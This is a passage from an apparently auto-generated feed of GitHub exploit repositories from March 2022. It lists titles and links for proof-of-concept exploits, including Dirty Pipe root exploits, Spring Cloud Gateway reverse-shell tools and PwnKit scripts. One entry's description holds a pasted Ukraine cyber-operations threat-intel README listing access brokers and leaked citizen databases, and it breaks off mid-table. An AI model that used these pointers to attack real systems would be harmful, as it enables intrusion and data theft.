**Bash script to check for CVE-2022-0847 "Dirty Pipe"** : [basharkey/CVE-2022-0847-dirty-pipe-checker](https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker) create time: 2022-03-08T17:13:24Z

**CVE-2022-24112: Apache APISIX Remote Code Execution Vulnerability** : [Mah1ndra/CVE-2022-244112](https://github.com/Mah1ndra/CVE-2022-244112) create time: 2022-03-08T17:08:52Z

**Docker exploit** : [mrchucu1/CVE-2022-0847-Docker](https://github.com/mrchucu1/CVE-2022-0847-Docker) create time: 2022-03-08T17:02:40Z

**no description** : [ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit) create time: 2022-03-08T15:33:39Z

**Implementation of Max Kellermann's exploit for CVE-2022-0847** : [0xIronGoat/dirty-pipe](https://github.com/0xIronGoat/dirty-pipe) create time: 2022-03-08T15:30:45Z

**no description** : [puckiestyle/CVE-2022-0847](https://github.com/puckiestyle/CVE-2022-0847) create time: 2022-03-08T14:46:21Z

**The Dirty Pipe Vulnerability** : [knqyf263/CVE-2022-0847](https://github.com/knqyf263/CVE-2022-0847) create time: 2022-03-08T13:48:55Z

**CVE-2022-25943** : [HadiMed/KINGSOFT-WPS-Office-LPE](https://github.com/HadiMed/KINGSOFT-WPS-Office-LPE) create time: 2021-07-09T23:34:57Z

**CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability** : [ahrixia/CVE_2022_0847](https://github.com/ahrixia/CVE_2022_0847) create time: 2022-03-08T12:43:43Z

**CVE-2022-0847 DirtyPipe Exploit.** : [febinrev/dirtypipez-exploit](https://github.com/febinrev/dirtypipez-exploit) create time: 2022-03-08T11:49:40Z

**An exploit for CVE-2022-0847 dirty-pipe vulnerability** : [cspshivam/CVE-2022-0847-dirty-pipe-exploit](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit) create time: 2022-03-08T10:40:07Z

**调试代码包含断点信息,直接导入即可进行调试** : [ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code](https://github.com/ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code) create time: 2022-03-08T10:07:54Z

**CVE-2022-22947_EXP,CVE-2022-22947_RCE,CVE-2022-22947反弹shell,CVE-2022-22947 getshell** : [aodsec/CVE-2022-22947](https://github.com/aodsec/CVE-2022-22947) create time: 2022-03-08T09:32:36Z

**no description** : [zhangweijie11/CVE-2020-17519](https://github.com/zhangweijie11/CVE-2020-17519) create time: 2022-03-08T09:19:27Z

**Linux Kernel Local Privilege Escalation Vulnerability CVE-2022-0847.** : [antx-code/CVE-2022-0847](https://github.com/antx-code/CVE-2022-0847) create time: 2022-03-08T09:10:51Z

**A python implementation of the Dirty Pipe exploit that adds an unprivliged user to the sudoers group.** : [eremus-dev/CVE-2016-5195-sudo-poc](https://github.com/eremus-dev/CVE-2016-5195-sudo-poc) create time: 2022-03-08T07:17:39Z

**CVE-2022-0487** : [si1ent-le/CVE-2022-0847](https://github.com/si1ent-le/CVE-2022-0847) create time: 2022-03-08T04:51:02Z

**Script en python de la vulnerabilidad CVE-2021-4034** : [GatoGamer1155/CVE-2021-4034](https://github.com/GatoGamer1155/CVE-2021-4034) create time: 2022-03-08T03:55:05Z

**no description** : [rahul1406/cve-2022-0847dirtypipe-exploit](https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit) create time: 2022-03-08T03:56:03Z

**Script en python de la vulnerabilidad CVE-2021-4034** : [GatoGamer1155/CVE-2021-4034](https://github.com/GatoGamer1155/CVE-2021-4034) create time: 2022-03-08T02:05:43Z

**CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令** : [Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-](https://github.com/Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-) create time: 2022-03-08T01:28:32Z

**no description** : [lucksec/CVE-2022-0847](https://github.com/lucksec/CVE-2022-0847) create time: 2022-03-08T01:17:09Z

**CVE-2022-0847 exploit one liner** : [carlosevieira/Dirty-Pipe](https://github.com/carlosevieira/Dirty-Pipe) create time: 2022-03-07T20:57:34Z

**66666** : [2xYuan/CVE-2022-0847](https://github.com/2xYuan/CVE-2022-0847) create time: 2022-03-07T19:56:37Z

**CVE-2022-21907: exploitation with Powershell, Python, Ruby, NMAP and Metasploit.** : [mauricelambert/CVE-2021-31166](https://github.com/mauricelambert/CVE-2021-31166) create time: 2022-03-07T18:56:52Z

**A root exploit for CVE-2022-0847** : [Arinerron/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit) create time: 2022-03-07T18:55:20Z

**CVE-2022-0847简单复现** : [imfiver/CVE-2022-0847](https://github.com/imfiver/CVE-2022-0847) create time: 2022-03-07T18:36:50Z

**Script CVE-2021-4034 en python** : [GatoGamer1155/CVE-2021-4034](https://github.com/GatoGamer1155/CVE-2021-4034) create time: 2022-03-07T15:10:32Z

**Vulnerability in the Linux kernel since 5.8** : [xndpxs/CVE-2022-0847](https://github.com/xndpxs/CVE-2022-0847) create time: 2022-03-07T17:51:02Z

**Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)** : [mrknow001/CVE-2022-22947](https://github.com/mrknow001/CVE-2022-22947) create time: 2022-03-07T16:24:42Z

**CVE-2022-0847** : [bbaranoff/CVE-2022-0847](https://github.com/bbaranoff/CVE-2022-0847) create time: 2022-03-07T15:50:18Z

**PoC for CVE-2022-23940** : [manuelz120/CVE-2022-23940](https://github.com/manuelz120/CVE-2022-23940) create time: 2022-03-06T17:05:02Z

**no description** : [darkb1rd/cve-2022-22947](https://github.com/darkb1rd/cve-2022-22947) create time: 2022-03-07T15:12:45Z

**This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.** : [Udyz/CVE-2022-0847](https://github.com/Udyz/CVE-2022-0847) create time: 2022-03-07T14:31:38Z

**CVE-2022-25636** : [Bonfee/CVE-2022-25636](https://github.com/Bonfee/CVE-2022-25636) create time: 2022-03-07T13:38:41Z

**SpringCloudGatewayRCE / Code By:Jun_sheng** : [Jun-5heng/CVE-2022-22947](https://github.com/Jun-5heng/CVE-2022-22947) create time: 2022-03-07T11:53:51Z

**no description** : [RobertDra/CVE-2022-25257](https://github.com/RobertDra/CVE-2022-25257) create time: 2022-03-07T10:19:20Z

**no description** : [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256) create time: 2022-03-07T10:18:41Z

**no description** : [puckiestyle/CVE-2022-0492](https://github.com/puckiestyle/CVE-2022-0492) create time: 2022-03-07T10:03:17Z

**Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)批量检测工具** : [YutuSec/SpEL](https://github.com/YutuSec/SpEL) create time: 2022-03-07T09:14:50Z

**Spring Cloud Gateway远程代码执行漏洞POC,基于命令执行的基础上,增加了反弹shell操作** : [j-jasson/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE](https://github.com/j-jasson/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE) create time: 2022-03-07T07:24:13Z

**It is a simple script coded in bash scripting to exploit the PwnKit vulnerability (cve-2021-4034), the idea of this is to try to automate the exploitation of this vulnerability as much as possible.** : [T369-Real/pwnkit-pwn](https://github.com/T369-Real/pwnkit-pwn) create time: 2022-03-05T19:49:52Z

**PoC for CVE-2020-0601 - CryptoAPI exploit** : [ioncodes/Curveball](https://github.com/ioncodes/Curveball) create time: 2020-01-28T21:24:54Z

**A script to check if a container environment is vulnerable to container escapes via CVE-2022-0492** : [SofianeHamlaoui/CVE-2022-0492-Checker](https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker) create time: 2022-03-06T10:57:09Z

**no description** : [Onurhan1337/CVE-2018-10933](https://github.com/Onurhan1337/CVE-2018-10933) create time: 2022-03-06T07:43:02Z

**Webmin CVE-2022-0824 Reverse Shell** : [faisalfs10x/Webmin-CVE-2022-0824-revshell](https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell) create time: 2022-03-06T00:03:31Z

**CVE-2022-23779: Internal Hostname Disclosure Vulnerability** : [fbusr/CVE-2022-23779](https://github.com/fbusr/CVE-2022-23779) create time: 2022-03-05T21:01:13Z

**CVE-2021-32099** : [akr3ch/CVE-2021-32099](https://github.com/akr3ch/CVE-2021-32099) create time: 2022-03-05T08:53:45Z

**no description** : [22ke/CVE-2022-22947](https://github.com/22ke/CVE-2022-22947) create time: 2022-03-05T06:19:46Z

**[Django]CVE-2017-1279475** : [thebatmanfuture/-Django-CVE-2017-1279475](https://github.com/thebatmanfuture/-Django-CVE-2017-1279475) create time: 2022-03-05T02:00:43Z

**Spring Cloud Gateway Actuator API SpEL Code Injection.** : [march0s1as/CVE-2022-22947](https://github.com/march0s1as/CVE-2022-22947) create time: 2022-03-04T18:37:57Z

**no description** : [gerr-re/cve-2022-24644](https://github.com/gerr-re/cve-2022-24644) create time: 2022-03-04T18:26:35Z

**CVE-2019-11043 LAB** : [jas9reet/CVE-2019-11043](https://github.com/jas9reet/CVE-2019-11043) create time: 2022-03-04T16:25:16Z

**I am not the real author of this exploits.. There are two exploits available, use any of one if it doesn't work use another one... Manual for this two exploit has given in README file. Please read that file before using it.. :)** : [PentesterSoham/CVE-2021-4034-exploit](https://github.com/PentesterSoham/CVE-2021-4034-exploit) create time: 2022-03-04T15:41:12Z

**Proof of concept for pwnkit vulnerability** : [PwnFunction/CVE-2021-4034](https://github.com/PwnFunction/CVE-2021-4034) create time: 2022-01-27T14:43:57Z

**批量url检测Spring-Cloud-Gateway-CVE-2022-22947** : [Xd-tl/CVE-2022-22947-Rce_POC](https://github.com/Xd-tl/CVE-2022-22947-Rce_POC) create time: 2022-03-04T14:58:02Z

**no description** : [puckiestyle/CVE-2021-3156](https://github.com/puckiestyle/CVE-2021-3156) create time: 2022-03-04T13:06:51Z

**CVE-2022-22947批量检测脚本,回显命令没进行正则,大佬们先用着,后续再更** : [chaosec2021/CVE-2022-22947-POC](https://github.com/chaosec2021/CVE-2022-22947-POC) create time: 2022-03-04T11:31:00Z

**Spring-Cloud-Gateway-CVE-2022-22947** : [nu0l/cve-2022-22947](https://github.com/nu0l/cve-2022-22947) create time: 2022-03-04T10:10:12Z

**Spring Cloud Gateway Actuator API 远程命令执行 CVE-2022-22947** : [dbgee/CVE-2022-22947](https://github.com/dbgee/CVE-2022-22947) create time: 2022-03-04T09:47:55Z

**​![​logo​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ci-logo.png) ​#​ ​Ukraine-Cyber-Operations ​Curated Intelligence is working with analysts from around the world to provide useful information to organisations in Ukraine looking for additional free threat intelligence. Slava Ukraini. Glory to Ukraine. ([​Blog​](https://www.curatedintel.org/2021/08/welcome.html) | [​Twitter​](https://twitter.com/CuratedIntel) | [​LinkedIn​](https://www.linkedin.com/company/curatedintelligence/)) ​![​timeline​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/uacyberopsv2.png) ​![​cyberwar​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/Russia-Ukraine%20Cyberwar.png) ​###​ ​Analyst Comments: ​-​ 2022-02-25 ​  ​-​ Creation of the initial repository to help organisations in Ukraine ​  ​-​ Added [​Threat Reports​](https://github.com/curated-intel/Ukraine-Cyber-Operations#threat-reports) section ​  ​-​ Added [​Vendor Support​](https://github.com/curated-intel/Ukraine-Cyber-Operations#vendor-support) section ​-​ 2022-02-26 ​  ​-​ Additional resources, chronologically ordered (h/t Orange-CD) ​  ​-​ Added [​Vetted OSINT Sources​](https://github.com/curated-intel/Ukraine-Cyber-Operations#vetted-osint-sources) section  ​  ​-​ Added [​Miscellaneous Resources​](https://github.com/curated-intel/Ukraine-Cyber-Operations#miscellaneous-resources) section ​-​ 2022-02-27 ​  ​-​ Additional threat reports have been added ​  ​-​ Added [​Data Brokers​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/README.md#data-brokers) section ​  ​-​ Added [​Access Brokers​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/README.md#access-brokers) section ​-​ 2022-02-28 ​  ​-​ Added Russian Cyber Operations Against Ukraine Timeline by ETAC ​  ​-​ Added Vetted and Contextualized [​Indicators of Compromise (IOCs)​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ETAC_Vetted_UkraineRussiaWar_IOCs.csv) by ETAC ​-​ 2022-03-01 ​  ​-​ Additional threat reports and resources have been added ​-​ 2022-03-02 ​  ​-​ Additional [​Indicators of Compromise (IOCs)​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2011) have been added ​  ​-​ Added vetted [​YARA rule collection​](https://github.com/curated-intel/Ukraine-Cyber-Operations/tree/main/yara) from the Threat Reports by ETAC ​  ​-​ Added loosely-vetted [​IOC Threat Hunt Feeds​](https://github.com/curated-intel/Ukraine-Cyber-Operations/tree/main/KPMG-Egyde_Ukraine-Crisis_Feeds/MISP-CSV_MediumConfidence_Filtered) by KPMG-Egyde CTI (h/t [​0xDISREL​](https://twitter.com/0xDISREL)) ​    ​-​ IOCs shared by these feeds are ​`LOW-TO-MEDIUM CONFIDENCE`​ we strongly recommend NOT adding them to a blocklist ​    ​-​ These could potentially be used for ​`THREAT HUNTING`​ and could be added to a ​`WATCHLIST` ​    ​-​ IOCs are generated in ​`MISP COMPATIBLE`​ CSV format ​-​ 2022-03-03 ​  ​-​ Additional threat reports and vendor support resources have been added ​  ​-​ Updated [​Log4Shell IOC Threat Hunt Feeds​](https://github.com/curated-intel/Log4Shell-IOCs/tree/main/KPMG_Log4Shell_Feeds) by KPMG-Egyde CTI; not directly related to Ukraine, but still a widespread vulnerability. ​  ​-​ Added diagram of Russia-Ukraine Cyberwar Participants 2022 by ETAC ​  ​-​ Additional [​Indicators of Compromise (IOCs)​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2042) have been added ​####​ ​`Threat Reports` ​| Date | Source | Threat(s) | URL | ​| --- | --- | --- | --- | ​| 14 JAN | SSU Ukraine | Website Defacements | [ssu.gov.ua](https://ssu.gov.ua/novyny/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy)| ​| 15 JAN | Microsoft | WhisperGate wiper (DEV-0586) | [microsoft.com](https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/) | ​| 19 JAN | Elastic | WhisperGate wiper (Operation BleedingBear) | [elastic.github.io](https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/) | ​| 31 JAN | Symantec | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [symantec-enterprise-blogs.security.com](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine) | ​| 2 FEB | RaidForums | Access broker "GodLevel" offering Ukrainain algricultural exchange | RaidForums [not linked] | ​| 2 FEB | CERT-UA | UAC-0056 using SaintBot and OutSteel malware | [cert.gov.ua](https://cert.gov.ua/article/18419) | ​| 3 FEB | PAN Unit42 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [unit42.paloaltonetworks.com](https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/) | ​| 4 FEB | Microsoft | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [microsoft.com](https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/) | ​| 8 FEB | NSFOCUS | Lorec53 (aka UAC-0056, EmberBear, BleedingBear) | [nsfocusglobal.com](https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government) | ​| 15 FEB | CERT-UA | DDoS attacks against the name server of government websites as well as Oschadbank (State Savings Bank) & Privatbank (largest commercial bank). False SMS and e-mails to create panic | [cert.gov.ua](https://cert.gov.ua/article/37139) | ​| 23 FEB | The Daily Beast | Ukrainian troops receive threatening SMS messages | [thedailybeast.com](https://www.thedailybeast.com/cyberattacks-hit-websites-and-psy-ops-sms-messages-targeting-ukrainians-ramp-up-as-russia-moves-into-ukraine) | ​| 23 FEB | UK NCSC | Sandworm/VoodooBear (GRU) | [ncsc.gov.uk](https://www.ncsc.gov.uk/files/Joint-Sandworm-Advisory.pdf) | ​| 23 FEB | SentinelLabs | HermeticWiper | [sentinelone.com]( https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ ) | ​| 24 FEB | ESET | HermeticWiper | [welivesecurity.com](https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/) | ​| 24 FEB | Symantec | HermeticWiper, PartyTicket ransomware, CVE-2021-1636, unknown webshell | [symantec-enterprise-blogs.security.com](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia) | ​| 24 FEB | Cisco Talos | HermeticWiper | [blog.talosintelligence.com](https://blog.talosintelligence.com/2022/02/threat-advisory-hermeticwiper.html) | ​| 24 FEB | Zscaler | HermeticWiper | [zscaler.com](https://www.zscaler.com/blogs/security-research/hermetic-wiper-resurgence-targeted-attacks-ukraine) | ​| 24 FEB | Cluster25 | HermeticWiper | [cluster25.io](https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/) | ​| 24 FEB | CronUp | Data broker "FreeCivilian" offering multiple .gov.ua | [twitter.com/1ZRR4H](https://twitter.com/1ZRR4H/status/1496931721052311557)| ​| 24 FEB | RaidForums | Data broker "Featherine" offering diia.gov.ua | RaidForums [not linked] | ​| 24 FEB | DomainTools | Unknown scammers | [twitter.com/SecuritySnacks](https://twitter.com/SecuritySnacks/status/1496956492636905473?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | ​| 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [twitter.com/500mk500](https://twitter.com/500mk500/status/1497339266329894920?s=20&t=opOtwpn82ztiFtwUbLkm9Q) | ​| 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [twitter.com/500mk500](https://twitter.com/500mk500/status/1497208285472215042)| ​| 25 FEB | Microsoft | HermeticWiper | [gist.github.com](https://gist.github.com/fr0gger/7882fde2b1b271f9e886a4a9b6fb6b7f) | ​| 25 FEB | 360 NetLab | DDoS (Mirai, Gafgyt, IRCbot, Ripprbot, Moobot) | [blog.netlab.360.com](https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/) | ​| 25 FEB | Conti [themselves] | Conti ransomware, BazarLoader | Conti News .onion [not linked] | ​| 25 FEB | CoomingProject [themselves] | Data Hostage Group | CoomingProject Telegram [not linked] | ​| 25 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | [CERT-UA Facebook](https://facebook.com/story.php?story_fbid=312939130865352&id=100064478028712)| ​| 25 FEB | Sekoia | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com/sekoia_io](https://twitter.com/sekoia_io/status/1497239319295279106) | ​| 25 FEB | @jaimeblascob | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com/jaimeblasco](https://twitter.com/jaimeblascob/status/1497242668627370009)| ​| 25 FEB | RISKIQ | UNC1151/Ghostwriter (Belarus MoD) | [community.riskiq.com](https://community.riskiq.com/article/e3a7ceea/) | ​| 25 FEB | MalwareHunterTeam | Unknown phishing | [twitter.com/malwrhunterteam](https://twitter.com/malwrhunterteam/status/1497235270416097287) | ​| 25 FEB | ESET | Unknown scammers | [twitter.com/ESETresearch](https://twitter.com/ESETresearch/status/1497194165561659394) | ​| 25 FEB | BitDefender | Unknown scammers | [blog.bitdefender.com](https://blog.bitdefender.com/blog/hotforsecurity/cybercriminals-deploy-spam-campaign-as-tens-of-thousands-of-ukrainians-seek-refuge-in-neighboring-countries/) | ​| 25 FEB | SSSCIP Ukraine | Unkown phishing | [twitter.com/dsszzi](https://twitter.com/dsszzi/status/1497103078029291522) | ​| 25 FEB | RaidForums | Data broker "NetSec"  offering FSB (likely SMTP accounts) | RaidForums [not linked] | ​| 25 FEB | Zscaler | PartyTicket decoy ransomware | [zscaler.com](https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware) | ​| 25 FEB | INCERT GIE | Cyclops Blink, HermeticWiper | [linkedin.com](https://www.linkedin.com/posts/activity-6902989337210740736-XohK) [Login Required] | ​| 25 FEB | Proofpoint | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com/threatinsight](https://twitter.com/threatinsight/status/1497355737844133895?s=20&t=Ubi0tb_XxGCbHLnUoQVp8w) | ​| 25 FEB | @fr0gger_ | HermeticWiper capabilities Overview | [twitter.com/fr0gger_](https://twitter.com/fr0gger_/status/1497121876870832128?s=20&t=_296n0bPeUgdXleX02M9mg) ​| 26 FEB | BBC Journalist | A fake Telegram account claiming to be President Zelensky is posting dubious messages | [twitter.com/shayan86](https://twitter.com/shayan86/status/1497485340738785283?s=21) | ​| 26 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | [CERT_UA Facebook](https://facebook.com/story.php?story_fbid=313517477474184&id=100064478028712) | ​| 26 FEB | MHT and TRMLabs | Unknown scammers, linked to ransomware | [twitter.com/joes_mcgill](https://twitter.com/joes_mcgill/status/1497609555856932864?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | ​| 26 FEB | US CISA | WhisperGate wiper, HermeticWiper | [cisa.gov](https://www.cisa.gov/uscert/ncas/alerts/aa22-057a) | ​| 26 FEB | Bloomberg | Destructive malware (possibly HermeticWiper) deployed at Ukrainian Ministry of Internal Affairs & data stolen from Ukrainian telecommunications networks | [bloomberg.com](https://www.bloomberg.com/news/articles/2022-02-26/hackers-destroyed-data-at-key-ukraine-agency-before-invasion?sref=ylv224K8) | ​| 26 FEB | Vice Prime Minister of Ukraine | IT ARMY of Ukraine created to crowdsource offensive operations against Russian infrastructure | [twitter.com/FedorovMykhailo](https://twitter.com/FedorovMykhailo/status/1497642156076511233) | ​| 26 FEB | Yoroi | HermeticWiper | [yoroi.company](https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures) | ​| 27 FEB | LockBit [themselves] | LockBit ransomware | LockBit .onion [not linked] |  ​| 27 FEB | ALPHV [themselves] | ALPHV ransomware | vHUMINT [closed source] | ​| 27 FEB | Mēris Botnet [themselves] | DDoS attacks | vHUMINT [closed source] | ​| 28 FEB | Horizon News [themselves] | Leak of China's Censorship Order about Ukraine | [TechARP](https://www-techarp-com.cdn.ampproject.org/c/s/www.techarp.com/internet/chinese-media-leaks-ukraine-censor/?amp=1)| ​| 28 FEB | Microsoft | FoxBlade (aka HermeticWiper) | [Microsoft](https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/?preview_id=65075) | ​| 28 FEB | @heymingwei | Potential BGP hijacks attempts against Ukrainian Internet Names Center | [https://twitter.com/heymingwei](https://twitter.com/heymingwei/status/1498362715198263300?s=20&t=Ju31gTurYc8Aq_yZMbvbxg) | ​| 28 FEB | @cyberknow20 | Stormous ransomware targets Ukraine Ministry of Foreign Affairs | [twitter.com/cyberknow20](https://twitter.com/cyberknow20/status/1498434090206314498?s=21) |  ​| 1 MAR | ESET | IsaacWiper and HermeticWizard | [welivesecurity.com](https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/) | ​| 1 MAR | Proofpoint | Ukrainian armed service member's email compromised and sent malspam containing the SunSeed malware (likely TA445/UNC1151/Ghostwriter) | [proofpoint.com](https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails) | ​| 1 MAR | Elastic | HermeticWiper | [elastic.github.io](https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/) | ​| 1 MAR | CrowdStrike | PartyTicket (aka HermeticRansom), DriveSlayer (aka HermeticWiper) | [CrowdStrike](https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/) | ​| 2 MAR | Zscaler | DanaBot operators launch DDoS attacks against the Ukrainian Ministry of Defense | [zscaler.com](https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense) | ​| 3 MAR | @ShadowChasing1 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [twitter.com/ShadowChasing1](https://twitter.com/ShadowChasing1/status/1499361093059153921) | ​| 3 MAR | @vxunderground | News website in Poland was reportedly compromised and the threat actor uploaded anti-Ukrainian propaganda | [twitter.com/vxunderground](https://twitter.com/vxunderground/status/1499374914758918151?s=20&t=jyy9Hnpzy-5P1gcx19bvIA) | ​| 3 MAR | @kylaintheburgh | Russian botnet on Twitter is pushing "#istandwithputin" and "#istandwithrussia" propaganda (in English) | [twitter.com/kylaintheburgh](https://twitter.com/kylaintheburgh/status/1499350578371067906?s=21) | ​| 3 MAR | @tracerspiff | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com](https://twitter.com/tracerspiff/status/1499444876810854408?s=21) | ​####​ ​`Access Brokers` ​| Date | Threat(s) | Source | ​| --- | --- | --- | ​| 23 JAN | Access broker "Mont4na" offering UkrFerry | RaidForums [not linked] | ​| 23 JAN | Access broker "Mont4na" offering PrivatBank | RaidForums [not linked] | ​| 24 JAN | Access broker "Mont4na" offering DTEK | RaidForums [not linked] | ​| 27 FEB | KelvinSecurity Sharing list of IP cameras in Ukraine | vHUMINT [closed source] | ​| 28 FEB | "w1nte4mute" looking to buy access to UA and NATO countries (likely ransomware affiliate) | vHUMINT [closed source] | ​####​ ​`Data Brokers` ​| Threat Actor    | Type            | Observation                                                                                               | Validated | Relevance                     | Source                                                     | ​| --------------- | --------------- | --------------------------------------------------------------------------------------------------------- | --------- | ----------------------------- | ---------------------------------------------------------- | ​| aguyinachair    | UA data sharing | PII DB of ukraine.com (shared as part of a generic compilation)                                           | No        | TA discussion in past 90 days | ELeaks Forum \[not linked\]                                | ​| an3key          | UA data sharing | DB of Ministry of Communities and Territories Development of Ukraine (minregion\[.\]gov\[.\]ua)           | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| an3key          | UA data sharing | DB of Ukrainian Ministry of Internal Affairs (wanted\[.\]mvs\[.\]gov\[.\]ua)                              | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (40M) of PrivatBank customers (privatbank\[.\]ua)                                                  | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | DB of "border crossing" DBs of DPR and LPR                                                                | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (7.5M) of Ukrainian passports                                                                      | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB of Ukrainian car registration, license plates, Ukrainian traffic police records                    | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (2.1M) of Ukrainian citizens                                                                       | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (28M) of Ukrainian citizens (passports, drivers licenses, photos)                                  | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (1M) of Ukrainian postal/courier service customers (novaposhta\[.\]ua)                             | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (10M) of Ukrainian telecom customers (vodafone\[.\]ua)                                             | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (3M) of Ukrainian telecom customers (lifecell\[.\]ua)                                              | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (13M) of Ukrainian telecom customers (kyivstar\[.\]ua)                                             | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| danieltx51      | UA data sharing | DB of Ministry of Foreign Affairs of Ukraine (mfa\[.\]gov\[.\]ua)                                         | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| DueDiligenceCIS | UA data sharing | PII DB (63M) of Ukrainian citizens (name, DOB, birth country, phone, TIN, passport, family, etc)          | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Featherine      | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine              | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Internal Affairs of Ukraine public data search engine (wanted\[.\]mvs\[.\]gov\[.\]ua)  | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\[.\]gov\[.\]ua)          | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of Motor Insurance Bureau of Ukraine (mtsbu\[.\]ua)                                                    | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing 